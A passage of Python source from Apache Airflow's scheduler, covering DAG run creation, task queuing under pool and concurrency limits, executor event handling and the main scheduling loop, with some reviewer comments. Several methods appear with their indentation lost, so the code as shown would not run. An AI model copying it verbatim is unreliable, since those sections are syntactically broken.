            if notification_sent:
                for sla in slas:
                    if email_sent:
                        sla.email_sent = True
                    sla.notification_sent = True
                    session.merge(sla)
            session.commit()
@staticmethod
def update_import_errors(session, dagbag):
"""
For the DAGs in the given DagBag, record any associated import errors and clears
errors for files that no longer have them. These are usually displayed through the
Airflow UI so that users know that there are issues parsing DAGs.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
:param dagbag: DagBag containing DAGs with import errors
:type dagbag: airflow.models.DagBag
"""
# Clear the errors of the processed files
for dagbag_file in dagbag.file_last_changed:
session.query(errors.ImportError).filter(
errors.ImportError.filename == dagbag_file
).delete()
# Add the errors of the processed files
for filename, stacktrace in dagbag.import_errors.items():
session.add(errors.ImportError(
filename=filename,
stacktrace=stacktrace))
session.commit()
    @provide_session
    def create_dag_run(self, dag, session=None):
        """
        This method checks whether a new DagRun needs to be created
        for a DAG based on scheduling interval.
        Returns DagRun if one is scheduled. Otherwise returns None.
        """
        # Only DAGs with a schedule, and only when job-based scheduling is on.
        if dag.schedule_interval and conf.getboolean('scheduler', 'USE_JOB_SCHEDULE'):
            active_runs = DagRun.find(
                dag_id=dag.dag_id,
                state=State.RUNNING,
                external_trigger=False,
                session=session
            )
            # return if already reached maximum active runs and no timeout setting
            if len(active_runs) >= dag.max_active_runs and not dag.dagrun_timeout:
                return
            # Fail active runs that exceeded dagrun_timeout; they free up slots.
            timedout_runs = 0
            for dr in active_runs:
                if (
                    dr.start_date and dag.dagrun_timeout and
                    dr.start_date < timezone.utcnow() - dag.dagrun_timeout):
                    dr.state = State.FAILED
                    dr.end_date = timezone.utcnow()
                    dag.handle_callback(dr, success=False, reason='dagrun_timeout',
                                        session=session)
                    timedout_runs += 1
            session.commit()
            if len(active_runs) - timedout_runs >= dag.max_active_runs:
                return
            # this query should be replaced by find dagrun
            qry = (
                session.query(func.max(DagRun.execution_date))
                .filter_by(dag_id=dag.dag_id)
                .filter(or_(
                    DagRun.external_trigger == False,  # noqa: E712 pylint: disable=singleton-comparison
                    # add % as a wildcard for the like query
                    DagRun.run_id.like(DagRun.ID_PREFIX + '%')
                ))
            )
            last_scheduled_run = qry.scalar()
            # don't schedule @once again
            if dag.schedule_interval == '@once' and last_scheduled_run:
                return None
            # don't do scheduler catchup for dag's that don't have dag.catchup = True
            if not (dag.catchup or dag.schedule_interval == '@once'):
                # The logic is that we move start_date up until
                # one period before, so that timezone.utcnow() is AFTER
                # the period end, and the job can be created...
                now = timezone.utcnow()
                next_start = dag.following_schedule(now)
                last_start = dag.previous_schedule(now)
                if next_start <= now:
                    new_start = last_start
                else:
                    new_start = dag.previous_schedule(last_start)
                # Effectively dag.start_date = max(new_start, dag.start_date).
                if dag.start_date:
                    if new_start >= dag.start_date:
                        dag.start_date = new_start
                else:
                    dag.start_date = new_start
            next_run_date = None
            if not last_scheduled_run:
                # First run
                task_start_dates = [t.start_date for t in dag.tasks]
                if task_start_dates:
                    next_run_date = dag.normalize_schedule(min(task_start_dates))
                    self.log.debug(
                        "Next run date based on tasks %s",
                        next_run_date
                    )
            else:
                next_run_date = dag.following_schedule(last_scheduled_run)
            # make sure backfills are also considered
            last_run = dag.get_last_dagrun(session=session)
            if last_run and next_run_date:
                while next_run_date <= last_run.execution_date:
                    next_run_date = dag.following_schedule(next_run_date)
            # don't ever schedule prior to the dag's start_date
            if dag.start_date:
                next_run_date = (dag.start_date if not next_run_date
                                 else max(next_run_date, dag.start_date))
                if next_run_date == dag.start_date:
                    next_run_date = dag.normalize_schedule(dag.start_date)
                self.log.debug(
                    "Dag start date: %s. Next run date: %s",
                    dag.start_date, next_run_date
                )
            # don't ever schedule in the future or if next_run_date is None
            if not next_run_date or next_run_date > timezone.utcnow():
                return
            # this structure is necessary to avoid a TypeError from concatenating
            # NoneType
            if dag.schedule_interval == '@once':
                period_end = next_run_date
            elif next_run_date:
                period_end = dag.following_schedule(next_run_date)
            # Don't schedule a dag beyond its end_date (as specified by the dag param)
            if next_run_date and dag.end_date and next_run_date > dag.end_date:
                return
            # Don't schedule a dag beyond its end_date (as specified by the task params)
            # Get the min task end date, which may come from the dag.default_args
            min_task_end_date = []
            task_end_dates = [t.end_date for t in dag.tasks if t.end_date]
            if task_end_dates:
                min_task_end_date = min(task_end_dates)
            if next_run_date and min_task_end_date and next_run_date > min_task_end_date:
                return
            # Only create the run once its whole period has elapsed.
            if next_run_date and period_end and period_end <= timezone.utcnow():
                next_run = dag.create_dagrun(
                    run_id=DagRun.ID_PREFIX + next_run_date.isoformat(),
                    execution_date=next_run_date,
                    start_date=timezone.utcnow(),
                    state=State.RUNNING,
                    external_trigger=False
                )
                return next_run
    @provide_session
    def _process_task_instances(self, dag, task_instances_list, session=None):
        """
        This method schedules the tasks for a single DAG by looking at the
        active DAG runs and adding task instances that should run to the
        queue (appended to ``task_instances_list`` as TI keys).
        """
        # update the state of the previously active dag runs
        dag_runs = DagRun.find(dag_id=dag.dag_id, state=State.RUNNING, session=session)
        active_dag_runs = []
        for run in dag_runs:
            self.log.info("Examining DAG run %s", run)
            # don't consider runs that are executed in the future
            if run.execution_date > timezone.utcnow():
                self.log.error(
                    "Execution date is in future: %s",
                    run.execution_date
                )
                continue
            if len(active_dag_runs) >= dag.max_active_runs:
                self.log.info("Number of active dag runs reached max_active_run.")
                break
            # skip backfill dagruns for now as long as they are not really scheduled
            if run.is_backfill:
                continue
            # todo: run.dag is transient but needs to be set
            run.dag = dag
            # todo: preferably the integrity check happens at dag collection time
            run.verify_integrity(session=session)
            run.update_state(session=session)
            if run.state == State.RUNNING:
                # Detach from the session so later commits don't expire it.
                make_transient(run)
                active_dag_runs.append(run)
        for run in active_dag_runs:
            self.log.debug("Examining active DAG run: %s", run)
            tis = run.get_task_instances(state=SCHEDULEABLE_STATES)
            # this loop is quite slow as it uses are_dependencies_met for
            # every task (in ti.is_runnable). This is also called in
            # update_state above which has already checked these tasks
            for ti in tis:
                task = dag.get_task(ti.task_id)
                # fixme: ti.task is transient but needs to be set
                ti.task = task
                if ti.are_dependencies_met(
                        dep_context=DepContext(flag_upstream_failed=True),
                        session=session):
                    self.log.debug('Queuing task: %s', ti)
                    task_instances_list.append(ti.key)
    @provide_session
    def _change_state_for_tis_without_dagrun(self,
                                             simple_dag_bag,
                                             old_states,
                                             new_state,
                                             session=None):
        """
        For all DAG IDs in the SimpleDagBag, look for task instances in the
        old_states and set them to new_state if the corresponding DagRun
        does not exist or exists but is not in the running state. This
        normally should not happen, but it can if the state of DagRuns are
        changed manually.

        :param old_states: examine TaskInstances in this state
        :type old_states: list[airflow.utils.state.State]
        :param new_state: set TaskInstances to this state
        :type new_state: airflow.utils.state.State
        :param simple_dag_bag: TaskInstances associated with DAGs in the
            simple_dag_bag and with states in the old_state will be examined
        :type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
        """
        tis_changed = 0
        # Outer-join to DagRun so TIs with no run at all are also matched.
        query = session \
            .query(models.TaskInstance) \
            .outerjoin(models.DagRun, and_(
                models.TaskInstance.dag_id == models.DagRun.dag_id,
                models.TaskInstance.execution_date == models.DagRun.execution_date)) \
            .filter(models.TaskInstance.dag_id.in_(simple_dag_bag.dag_ids)) \
            .filter(models.TaskInstance.state.in_(old_states)) \
            .filter(or_(
                models.DagRun.state != State.RUNNING,
                models.DagRun.state.is_(None)))
        # SQLite cannot run the subquery UPDATE below, so update row by row.
        if self.using_sqlite:
            tis_to_change = query \
                .with_for_update() \
                .all()
            for ti in tis_to_change:
                ti.set_state(new_state, session=session)
                tis_changed += 1
        else:
            # Single bulk UPDATE keyed on the subquery result.
            subq = query.subquery()
            tis_changed = session \
                .query(models.TaskInstance) \
                .filter(and_(
                    models.TaskInstance.dag_id == subq.c.dag_id,
                    models.TaskInstance.task_id == subq.c.task_id,
                    models.TaskInstance.execution_date ==
                    subq.c.execution_date)) \
                .update({models.TaskInstance.state: new_state},
                        synchronize_session=False)
            session.commit()
        if tis_changed > 0:
            self.log.warning(
                "Set %s task instances to state=%s as their associated DagRun was not in RUNNING state",
                tis_changed, new_state
            )
        Stats.gauge('scheduler.tasks.without_dagrun', tis_changed)
@provide_session
def __get_concurrency_maps(self, states, session=None):
"""
Get the concurrency maps.
:param states: List of states to query for
:type states: list[airflow.utils.state.State]
:return: A map from (dag_id, task_id) to # of task instances and
a map from (dag_id, task_id) to # of task instances in the given state list
:rtype: dict[tuple[str, str], int]
"""
TI = models.TaskInstance
ti_concurrency_query = (
session
.query(TI.task_id, TI.dag_id, func.count('*'))
.filter(TI.state.in_(states))
.group_by(TI.task_id, TI.dag_id)
).all()
dag_map = defaultdict(int)
task_map = defaultdict(int)
for result in ti_concurrency_query:
task_id, dag_id, count = result
dag_map[dag_id] += count
task_map[(dag_id, task_id)] = count
return dag_map, task_map
    @provide_session
    def _find_executable_task_instances(self, simple_dag_bag, states, session=None):
        """
        Finds TIs that are ready for execution with respect to pool limits,
        dag concurrency, executor state, and priority.

        :param simple_dag_bag: TaskInstances associated with DAGs in the
            simple_dag_bag will be fetched from the DB and executed
        :type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
        :param states: Execute TaskInstances in these states
        :type states: tuple[airflow.utils.state.State]
        :return: list[airflow.models.TaskInstance]
        """
        from airflow.jobs.backfill_job import BackfillJob  # Avoid circular import
        executable_tis = []
        # Get all task instances associated with scheduled
        # DagRuns which are not backfilled, in the given states,
        # and the dag is not paused
        TI = models.TaskInstance
        DR = models.DagRun
        DM = models.DagModel
        ti_query = (
            session
            .query(TI)
            .filter(TI.dag_id.in_(simple_dag_bag.dag_ids))
            .outerjoin(
                DR,
                and_(DR.dag_id == TI.dag_id, DR.execution_date == TI.execution_date)
            )
            .filter(or_(DR.run_id == None,  # noqa: E711 pylint: disable=singleton-comparison
                    not_(DR.run_id.like(BackfillJob.ID_PREFIX + '%'))))
            .outerjoin(DM, DM.dag_id == TI.dag_id)
            .filter(or_(DM.dag_id == None,  # noqa: E711 pylint: disable=singleton-comparison
                    not_(DM.is_paused)))
        )
        # Additional filters on task instance state
        if None in states:
            ti_query = ti_query.filter(
                or_(TI.state == None, TI.state.in_(states))  # noqa: E711 pylint: disable=singleton-comparison
            )
        else:
            ti_query = ti_query.filter(TI.state.in_(states))
        task_instances_to_examine = ti_query.all()
        if len(task_instances_to_examine) == 0:
            self.log.debug("No tasks to consider for execution.")
            return executable_tis
        # Put one task instance on each line
        task_instance_str = "\n\t".join(
            [repr(x) for x in task_instances_to_examine])
        self.log.info(
            "%s tasks up for execution:\n\t%s", len(task_instances_to_examine),
            task_instance_str
        )
        # Get the pool settings
        pools = {p.pool: p for p in session.query(models.Pool).all()}
        pool_to_task_instances = defaultdict(list)
        for task_instance in task_instances_to_examine:
            pool_to_task_instances[task_instance.pool].append(task_instance)
        # dag_id to # of running tasks and (dag_id, task_id) to # of running tasks.
        dag_concurrency_map, task_concurrency_map = self.__get_concurrency_maps(
            states=STATES_TO_COUNT_AS_RUNNING, session=session)
        # Go through each pool, and queue up a task for execution if there are
        # any open slots in the pool.
        for pool, task_instances in pool_to_task_instances.items():
            pool_name = pool
            if pool not in pools:
                self.log.warning(
                    "Tasks using non-existent pool '%s' will not be scheduled",
                    pool
                )
                continue
            else:
                open_slots = pools[pool].open_slots(session=session)
            num_ready = len(task_instances)
            self.log.info(
                "Figuring out tasks to run in Pool(name=%s) with %s open slots "
                "and %s task instances ready to be queued",
                pool, open_slots, num_ready
            )
            # Highest priority first; ties broken by oldest execution_date.
            priority_sorted_task_instances = sorted(
                task_instances, key=lambda ti: (-ti.priority_weight, ti.execution_date))
            # Number of tasks that cannot be scheduled because of no open slot in pool
            # NOTE(review): these counters are reset per pool but reported as
            # scheduler-wide gauges after the loop, so the global stats only
            # reflect the last pool iterated — confirm whether that is intended.
            num_starving_tasks = 0
            num_tasks_in_executor = 0
            for current_index, task_instance in enumerate(priority_sorted_task_instances):
                if open_slots <= 0:
                    self.log.info(
                        "Not scheduling since there are %s open slots in pool %s",
                        open_slots, pool
                    )
                    # Can't schedule any more since there are no more open slots.
                    num_starving_tasks = len(priority_sorted_task_instances) - current_index
                    break
                # Check to make sure that the task concurrency of the DAG hasn't been
                # reached.
                dag_id = task_instance.dag_id
                simple_dag = simple_dag_bag.get_dag(dag_id)
                current_dag_concurrency = dag_concurrency_map[dag_id]
                dag_concurrency_limit = simple_dag_bag.get_dag(dag_id).concurrency
                self.log.info(
                    "DAG %s has %s/%s running and queued tasks",
                    dag_id, current_dag_concurrency, dag_concurrency_limit
                )
                if current_dag_concurrency >= dag_concurrency_limit:
                    self.log.info(
                        "Not executing %s since the number of tasks running or queued "
                        "from DAG %s is >= to the DAG's task concurrency limit of %s",
                        task_instance, dag_id, dag_concurrency_limit
                    )
                    continue
                # Per-task concurrency cap (operator-level task_concurrency arg).
                task_concurrency_limit = simple_dag.get_task_special_arg(
                    task_instance.task_id,
                    'task_concurrency')
                if task_concurrency_limit is not None:
                    current_task_concurrency = task_concurrency_map[
                        (task_instance.dag_id, task_instance.task_id)
                    ]
                    if current_task_concurrency >= task_concurrency_limit:
                        self.log.info("Not executing %s since the task concurrency for"
                                      " this task has been reached.", task_instance)
                        continue
                if self.executor.has_task(task_instance):
                    self.log.debug(
                        "Not handling task %s as the executor reports it is running",
                        task_instance.key
                    )
                    num_tasks_in_executor += 1
                    continue
                executable_tis.append(task_instance)
                # Account for this pick so later candidates see updated counts.
                open_slots -= 1
                dag_concurrency_map[dag_id] += 1
                task_concurrency_map[(task_instance.dag_id, task_instance.task_id)] += 1
            Stats.gauge('pool.starving_tasks.{pool_name}'.format(pool_name=pool_name),
                        num_starving_tasks)
            Stats.gauge('pool.open_slots.{pool_name}'.format(pool_name=pool_name),
                        pools[pool_name].open_slots())
            Stats.gauge('pool.used_slots.{pool_name}'.format(pool_name=pool_name),
                        pools[pool_name].occupied_slots())
        Stats.gauge('scheduler.tasks.pending', len(task_instances_to_examine))
        Stats.gauge('scheduler.tasks.running', num_tasks_in_executor)
        Stats.gauge('scheduler.tasks.starving', num_starving_tasks)
        Stats.gauge('scheduler.tasks.executable', len(executable_tis))
        task_instance_str = "\n\t".join(
            [repr(x) for x in executable_tis])
        self.log.info(
            "Setting the following tasks to queued state:\n\t%s", task_instance_str)
        # so these dont expire on commit
        for ti in executable_tis:
            copy_dag_id = ti.dag_id
            copy_execution_date = ti.execution_date
            copy_task_id = ti.task_id
            make_transient(ti)
            ti.dag_id = copy_dag_id
            ti.execution_date = copy_execution_date
            ti.task_id = copy_task_id
        return executable_tis
    @provide_session
    def _change_state_for_executable_task_instances(self, task_instances,
                                                    acceptable_states, session=None):
        """
        Changes the state of task instances in the list with one of the given states
        to QUEUED atomically, and returns the TIs changed in SimpleTaskInstance format.

        :param task_instances: TaskInstances to change the state of
        :type task_instances: list[airflow.models.TaskInstance]
        :param acceptable_states: Filters the TaskInstances updated to be in these states
        :type acceptable_states: Iterable[State]
        :rtype: list[airflow.utils.dag_processing.SimpleTaskInstance]
        """
        if len(task_instances) == 0:
            session.commit()
            return []
        TI = models.TaskInstance
        # One (dag_id, task_id, execution_date) predicate per candidate TI.
        filter_for_ti_state_change = (
            [and_(
                TI.dag_id == ti.dag_id,
                TI.task_id == ti.task_id,
                TI.execution_date == ti.execution_date)
            for ti in task_instances])
        ti_query = (
            session
            .query(TI)
            .filter(or_(*filter_for_ti_state_change)))
        if None in acceptable_states:
            ti_query = ti_query.filter(
                or_(TI.state == None, TI.state.in_(acceptable_states))  # noqa pylint: disable=singleton-comparison
            )
        else:
            ti_query = ti_query.filter(TI.state.in_(acceptable_states))
        # Row-lock the matching TIs so concurrent schedulers can't double-queue.
        tis_to_set_to_queued = (
            ti_query
            .with_for_update()
            .all())
        if len(tis_to_set_to_queued) == 0:
            self.log.info("No tasks were able to have their state changed to queued.")
            session.commit()
            return []
        # set TIs to queued state
        for task_instance in tis_to_set_to_queued:
            task_instance.state = State.QUEUED
            # Keep an existing queued timestamp; only stamp first-time queuing.
            task_instance.queued_dttm = (timezone.utcnow()
                                         if not task_instance.queued_dttm
                                         else task_instance.queued_dttm)
            session.merge(task_instance)
        # Generate a list of SimpleTaskInstance for the use of queuing
        # them in the executor.
        simple_task_instances = [SimpleTaskInstance(ti) for ti in
                                 tis_to_set_to_queued]
        task_instance_str = "\n\t".join(
            [repr(x) for x in tis_to_set_to_queued])
        session.commit()
        self.log.info("Setting the following %s tasks to queued state:\n\t%s",
                      len(tis_to_set_to_queued), task_instance_str)
        return simple_task_instances
def _enqueue_task_instances_with_queued_state(self, simple_dag_bag,
simple_task_instances):
"""
Takes task_instances, which should have been set to queued, and enqueues them
with the executor.
:param simple_task_instances: TaskInstances to enqueue
:type simple_task_instances: list[SimpleTaskInstance]
:param simple_dag_bag: Should contains all of the task_instances' dags
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
"""
TI = models.TaskInstance
# actually enqueue them
for simple_task_instance in simple_task_instances:
simple_dag = simple_dag_bag.get_dag(simple_task_instance.dag_id)
command = TI.generate_command(
simple_task_instance.dag_id,
simple_task_instance.task_id,
simple_task_instance.execution_date,
local=True,
mark_success=False,
ignore_all_deps=False,
ignore_depends_on_past=False,
ignore_task_deps=False,
ignore_ti_state=False,
pool=simple_task_instance.pool,
file_path=simple_dag.full_filepath,
pickle_id=simple_dag.pickle_id)
priority = simple_task_instance.priority_weight
queue = simple_task_instance.queue
self.log.info(
"Sending %s to executor with priority %s and queue %s",
simple_task_instance.key, priority, queue
)
self.executor.queue_command(
simple_task_instance,
command,
priority=priority,
queue=queue)
    @provide_session
    def _execute_task_instances(self,
                                simple_dag_bag,
                                states,
                                session=None):
        """
        Attempts to execute TaskInstances that should be executed by the scheduler.

        There are three steps:
        1. Pick TIs by priority with the constraint that they are in the expected states
           and that we do not exceed max_active_runs or pool limits.
        2. Change the state for the TIs above atomically.
        3. Enqueue the TIs in the executor.

        :param simple_dag_bag: TaskInstances associated with DAGs in the
            simple_dag_bag will be fetched from the DB and executed
        :type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
        :param states: Execute TaskInstances in these states
        :type states: tuple[airflow.utils.state.State]
        :return: Number of task instance with state changed.
        """
        executable_tis = self._find_executable_task_instances(simple_dag_bag, states,
                                                              session=session)
        # Reducer applied to each chunk of executable TIs: queue the chunk in
        # the DB and the executor, accumulating the number of TIs changed.
        def query(result, items):
            simple_tis_with_state_changed = \
                self._change_state_for_executable_task_instances(items,
                                                                 states,
                                                                 session=session)
            self._enqueue_task_instances_with_queued_state(
                simple_dag_bag,
                simple_tis_with_state_changed)
            session.commit()
            return result + len(simple_tis_with_state_changed)
        # Process at most max_tis_per_query TIs per DB round-trip.
        return helpers.reduce_in_chunks(query, executable_tis, 0, self.max_tis_per_query)
    @provide_session
    def _change_state_for_tasks_failed_to_execute(self, session):
        """
        If there are tasks left over in the executor,
        we set them back to SCHEDULED to avoid creating hanging tasks.

        :param session: session for ORM operations
        """
        if self.executor.queued_tasks:
            TI = models.TaskInstance
            # Match only TIs still QUEUED for the same try the executor holds.
            filter_for_ti_state_change = (
                [and_(
                    TI.dag_id == dag_id,
                    TI.task_id == task_id,
                    TI.execution_date == execution_date,
                    # The TI.try_number will return raw try_number+1 since the
                    # ti is not running. And we need to -1 to match the DB record.
                    TI._try_number == try_number - 1,
                    TI.state == State.QUEUED)
                    for dag_id, task_id, execution_date, try_number
                    in self.executor.queued_tasks.keys()])
            ti_query = (session.query(TI)
                        .filter(or_(*filter_for_ti_state_change)))
            # Row-lock so concurrent schedulers don't race on the same TIs.
            tis_to_set_to_scheduled = (ti_query
                                       .with_for_update()
                                       .all())
            if len(tis_to_set_to_scheduled) == 0:
                session.commit()
                return
            # set TIs back to SCHEDULED state
            for task_instance in tis_to_set_to_scheduled:
                task_instance.state = State.SCHEDULED
            task_instance_str = "\n\t".join(
                [repr(x) for x in tis_to_set_to_scheduled])
            session.commit()
            self.log.info("Set the following tasks to scheduled state:\n\t%s", task_instance_str)
def _process_dags(self, dagbag, dags, tis_out):
"""
Iterates over the dags and processes them. Processing includes:
1. Create appropriate DagRun(s) in the DB.
2. Create appropriate TaskInstance(s) in the DB.
3. Send emails for tasks that have missed SLAs.
:param dagbag: a collection of DAGs to process
:type dagbag: airflow.models.DagBag
:param dags: the DAGs from the DagBag to process
:type dags: airflow.models.DAG
:param tis_out: A list to add generated TaskInstance objects
:type tis_out: list[TaskInstance]
:rtype: None
"""
for dag in dags:
dag = dagbag.get_dag(dag.dag_id)
if not dag:
self.log.error("DAG ID %s was not found in the DagBag", dag.dag_id)
continue
if dag.is_paused:
self.log.info("Not processing DAG %s since it's paused", dag.dag_id)
continue
self.log.info("Processing %s", dag.dag_id)
# Only creates DagRun for DAGs that are not subdag since
# DagRun of subdags are created when SubDagOperator executes.
if not dag.is_subdag:
dag_run = self.create_dag_run(dag)
if dag_run:
expected_start_date = dag.following_schedule(dag_run.execution_date)
if expected_start_date:
schedule_delay = dag_run.start_date - expected_start_date
Stats.timing(
'dagrun.schedule_delay.{dag_id}'.format(dag_id=dag.dag_id),
schedule_delay)
self.log.info("Created %s", dag_run)
self._process_task_instances(dag, tis_out)
self.manage_slas(dag)
@provide_session
def _process_executor_events(self, simple_dag_bag, session=None):
    """
    Respond to executor events.

    For every (dag_id, task_id, execution_date, try_number) key the executor
    reports as FAILED/SUCCESS, reconcile the DB TaskInstance; a TI still
    QUEUED at the same try number was likely killed externally and is failed.

    :param simple_dag_bag: bag whose dag_ids select which events to consume
    :param session: DB session (injected by @provide_session)
    :rtype: None
    """
    # TODO: this shares quite a lot of code with _manage_executor_state
    TI = models.TaskInstance
    for key, state in list(self.executor.get_event_buffer(simple_dag_bag.dag_ids)
                           .items()):
        dag_id, task_id, execution_date, try_number = key
        self.log.info(
            "Executor reports execution of %s.%s execution_date=%s "
            "exited with status %s for try_number %s",
            dag_id, task_id, execution_date, state, try_number
        )
        if state in (State.FAILED, State.SUCCESS):
            qry = session.query(TI).filter(TI.dag_id == dag_id,
                                           TI.task_id == task_id,
                                           TI.execution_date == execution_date)
            ti = qry.first()
            if not ti:
                # BUGFIX: `ti` is None on this path, so log the identifying
                # key instead of the useless None value.
                self.log.warning(
                    "TaskInstance %s.%s execution_date=%s went missing from the database",
                    dag_id, task_id, execution_date)
                continue

            # TODO: should we fail RUNNING as well, as we do in Backfills?
            if ti.try_number == try_number and ti.state == State.QUEUED:
                # Executor says the task finished, yet the DB still shows it
                # QUEUED at the same try — it probably died out of band.
                msg = ("Executor reports task instance {} finished ({}) "
                       "although the task says its {}. Was the task "
                       "killed externally?".format(ti, state, ti.state))
                self.log.error(msg)
                try:
                    simple_dag = simple_dag_bag.get_dag(dag_id)
                    dagbag = models.DagBag(simple_dag.full_filepath)
                    dag = dagbag.get_dag(dag_id)
                    ti.task = dag.get_task(task_id)
                    # Runs failure callbacks / retry logic for the TI.
                    ti.handle_failure(msg)
                except Exception:
                    self.log.error("Cannot load the dag bag to handle failure for %s"
                                   ". Setting task to FAILED without callbacks or "
                                   "retries. Do you have enough resources?", ti)
                    ti.state = State.FAILED
                    session.merge(ti)
                    session.commit()
def _execute(self):
    """Run the scheduler: discover DAG files, start the processor agent, loop."""
    self.log.info("Starting the scheduler")

    # Some executors allow DAGs to be pickled for remote execution.
    pickle_dags = (self.do_pickle and
                   self.executor.__class__ not in
                   (executors.LocalExecutor, executors.SequentialExecutor))

    self.log.info("Processing each file at most %s times", self.num_runs)

    # Build up the list of Python files that could contain DAGs.
    self.log.info("Searching for files in %s", self.subdir)
    known_file_paths = list_py_file_paths(self.subdir)
    self.log.info("There are %s files in %s", len(known_file_paths), self.subdir)

    def processor_factory(file_path, zombies):
        # One DagFileProcessor per DAG file.
        return DagFileProcessor(file_path, pickle_dags, self.dag_ids, zombies)

    # When using sqlite, we do not use async_mode so the scheduler job and
    # the DAG parser don't access the DB at the same time.
    async_mode = not self.using_sqlite

    timeout_seconds = conf.getint('core', 'dag_file_processor_timeout')
    self.processor_agent = DagFileProcessorAgent(self.subdir,
                                                 known_file_paths,
                                                 self.num_runs,
                                                 processor_factory,
                                                 timedelta(seconds=timeout_seconds),
                                                 async_mode)
    try:
        self._execute_helper()
    except Exception:
        self.log.exception("Exception when executing execute_helper")
    finally:
        self.processor_agent.end()
    self.log.info("Exited execute loop")
def _execute_helper(self):
    """
    The actual scheduler loop. The main steps in the loop are:

    #. Harvest DAG parsing results through DagFileProcessorAgent
    #. Find and queue executable tasks
    #. Change task instance state in DB
    #. Queue tasks in executor
    #. Heartbeat executor
    #. Execute queued tasks in executor asynchronously
    #. Sync on the states of running tasks

    Following is a graphic representation of these steps.

    .. image:: ../docs/img/scheduler_loop.jpg

    :rtype: None
    """
    self.executor.start()

    self.log.info("Resetting orphaned tasks for active dag runs")
    self.reset_state_for_orphaned_tasks()

    # Start after resetting orphaned tasks to avoid stressing out DB.
    self.processor_agent.start()

    execute_start_time = timezone.utcnow()

    # Last time that self.heartbeat() was called.
    last_self_heartbeat_time = timezone.utcnow()

    # For the execute duration, parse and schedule DAGs
    while True:
        self.log.debug("Starting Loop...")
        loop_start_time = time.time()

        if self.using_sqlite:
            self.processor_agent.heartbeat()
            # For the sqlite case w/ 1 thread, wait until the processor
            # is finished to avoid concurrent access to the DB.
            self.log.debug(
                "Waiting for processors to finish since we're using sqlite")
            self.processor_agent.wait_until_finished()

        self.log.debug("Harvesting DAG parsing results")
        simple_dags = self.processor_agent.harvest_simple_dags()
        self.log.debug("Harvested {} SimpleDAGs".format(len(simple_dags)))

        # Send tasks for execution if available
        simple_dag_bag = SimpleDagBag(simple_dags)

        if len(simple_dags) > 0:
            try:
                # NOTE(review): this re-creates the SimpleDagBag built just
                # above; harmless, but redundant.
                simple_dag_bag = SimpleDagBag(simple_dags)

                # Handle cases where a DAG run state is set (perhaps manually) to
                # a non-running state. Handle task instances that belong to
                # DAG runs in those states

                # If a task instance is up for retry but the corresponding DAG run
                # isn't running, mark the task instance as FAILED so we don't try
                # to re-run it.
                self._change_state_for_tis_without_dagrun(simple_dag_bag,
                                                          [State.UP_FOR_RETRY],
                                                          State.FAILED)
                # If a task instance is scheduled or queued or up for reschedule,
                # but the corresponding DAG run isn't running, set the state to
                # NONE so we don't try to re-run it.
                self._change_state_for_tis_without_dagrun(simple_dag_bag,
                                                          [State.QUEUED,
                                                           State.SCHEDULED,
                                                           State.UP_FOR_RESCHEDULE],
                                                          State.NONE)

                self._execute_task_instances(simple_dag_bag,
                                             (State.SCHEDULED,))
            except Exception as e:
                self.log.error("Error queuing tasks")
                self.log.exception(e)
                continue

        # Call heartbeats
        self.log.debug("Heartbeating the executor")
        self.executor.heartbeat()

        self._change_state_for_tasks_failed_to_execute()

        # Process events from the executor
        self._process_executor_events(simple_dag_bag)

        # Heartbeat the scheduler periodically
        time_since_last_heartbeat = (timezone.utcnow() -
                                     last_self_heartbeat_time).total_seconds()
        if time_since_last_heartbeat > self.heartrate:
            self.log.debug("Heartbeating the scheduler")
            self.heartbeat()
            last_self_heartbeat_time = timezone.utcnow()

        is_unit_test = conf.getboolean('core', 'unit_test_mode')
        loop_end_time = time.time()
        loop_duration = loop_end_time - loop_start_time
        self.log.debug(
            "Ran scheduling loop in %.2f seconds",
            loop_duration)

        if not is_unit_test:
            self.log.debug("Sleeping for %.2f seconds", self._processor_poll_interval)
            time.sleep(self._processor_poll_interval)

        if self.processor_agent.done:
            self.log.info("Exiting scheduler loop as all files"
                          " have been processed {} times".format(self.num_runs))
            break

        if loop_duration < 1 and not is_unit_test:
            sleep_length = 1 - loop_duration
            self.log.debug(
                "Sleeping for {0:.2f} seconds to prevent excessive logging"
                .format(sleep_length))
            # NOTE(review): bare `sleep` here vs `time.sleep` above —
            # presumably `from time import sleep` exists at file top; confirm.
            sleep(sleep_length)

    # Stop any processors
    self.processor_agent.terminate()

    # Verify that all files were processed, and if so, deactivate DAGs that
    # haven't been touched by the scheduler as they likely have been
    # deleted.
    if self.processor_agent.all_files_processed:
        self.log.info(
            "Deactivating DAGs that haven't been touched since %s",
            execute_start_time.isoformat()
        )
        models.DAG.deactivate_stale_dags(execute_start_time)

    self.executor.end()

    settings.Session.remove()
def _find_dags_to_process(self, dags: List[DAG], paused_dag_ids: Set[str]):
    """
    Find the DAGs that are not paused to process.

    When the scheduler was started with an explicit dag_ids allow-list,
    only DAGs on that list are considered.

    :param dags: specified DAGs
    :param paused_dag_ids: paused DAG IDs
    :return: DAGs to process
    """
    restrict_to_ids = len(self.dag_ids) > 0
    selected = []
    for candidate in dags:
        if candidate.dag_id in paused_dag_ids:
            continue
        if restrict_to_ids and candidate.dag_id not in self.dag_ids:
            continue
        selected.append(candidate)
    return selected
@provide_session
def process_file(self, file_path, zombies, pickle_dags=False, session=None):
    """
    Process a Python file containing Airflow DAGs.

    This includes:

    1. Execute the file and look for DAG objects in the namespace.
    2. Pickle the DAG and save it to the DB (if necessary).
    3. For each DAG, see what tasks should run and create appropriate task
       instances in the DB.
    4. Record any errors importing the file into ORM
    5. Kill (in ORM) any task instances belonging to the DAGs that haven't
       issued a heartbeat in a while.

    :param file_path: the path to the Python file that should be executed
    :type file_path: unicode
    :param zombies: zombie task instances to kill.
    :type zombies: list[airflow.utils.dag_processing.SimpleTaskInstance]
    :param pickle_dags: whether serialize the DAGs found in the file and
        save them to the db
    :type pickle_dags: bool
    :return: a 2-tuple of (SimpleDags made from the Dags found in the file,
        number of import errors for the file)
    :rtype: (list[airflow.utils.dag_processing.SimpleDag], int)
    """
    self.log.info("Processing file %s for tasks to queue", file_path)
    # As DAGs are parsed from this file, they will be converted into SimpleDags
    simple_dags = []

    try:
        dagbag = models.DagBag(file_path, include_examples=False)
    except Exception:
        self.log.exception("Failed at reloading the DAG file %s", file_path)
